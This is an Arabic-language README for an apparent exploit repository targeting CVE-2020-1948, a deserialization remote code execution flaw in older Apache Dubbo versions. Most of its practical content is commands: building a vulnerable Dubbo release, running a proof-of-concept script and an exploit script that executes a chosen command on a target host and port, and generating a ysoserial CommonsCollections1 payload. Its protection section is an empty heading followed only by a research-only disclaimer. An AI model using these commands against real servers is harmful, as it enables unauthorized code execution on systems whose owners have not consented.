
[CVE-2020-1948] Apache Dubbo Provider إلغاء التسلسل الافتراضي يؤدي إلى RCE
يحتوي هذا المستودع على مواد بحثية، كود إثبات المفهوم، وأدوات استغلال تتعلق بثغرات إلغاء التسلسل في Apache Dubbo، مع التركيز الأساسي على CVE-2020-1948.
إصدارات Apache Dubbo الأقدم من 2.7.8 و 2.6.9 و 2.5.10 معرضة لهجوم تنفيذ تعليمات برمجية عن بُعد (CVE-2020-1948) بسبب إلغاء التسلسل غير الآمن. تؤثر الثغرة على مكون Dubbo Provider، الذي يستخدم التسلسل الأصلي لـ Java دون تحقق مناسب.
يمكن استغلال هذه الثغرة عبر عدة ناقلات:
# استنساخ وبناء إصدار ضعيف من Dubbo
cd dubbo-dubbo-2.7.5
mvn clean package
# تشغيل إثبات المفهوم
python dubboPoc.py -t <target_ip> -p <target_port>
# تشغيل أداة الاستغلال
python dubboExp.py -t <target_ip> -p <target_port> -c "command_to_execute"
يمكنك استخدام ysoserial.jar لتوليد حمولات مخصصة:
java -jar ysoserial.jar CommonsCollections1 "command_to_execute" > payload.ser
للحماية من هذه الثغرات:
هذا المستودع مخصص لأغراض البحث الأمني والتعليم فقط. يجب استخدام الكود والأدوات المقدمة فقط ضد الأنظمة التي لديك الإذن باختبارها. أي استخدام خاطئ لهذه المعلومات ليس من مسؤولية مالك المستودع.